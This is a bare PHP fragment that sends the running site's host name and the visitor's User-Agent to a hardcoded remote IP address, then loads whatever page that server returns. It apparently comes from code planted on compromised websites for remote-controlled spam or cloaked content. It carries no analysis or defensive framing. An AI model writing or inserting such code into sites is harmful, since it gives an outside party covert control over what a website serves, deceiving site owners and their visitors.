header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://103.30.43.115/";  
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);

function getHTTPPage($url) {
            $user_agent = "User-Agent: ".$_SERVER['HTTP_USER_AGENT'];
	$opts = array(
	  'http'=>array(
		'method'=>"GET",
		'header'=>$user_agent
	  )
	);
	$context = stream_context_create($opts);
	$html = file_get_contents($url, false, $context);
	if (empty($html)) {
		header('HTTP/1.0 404 Not Found');
	}	
	return $html;
} 
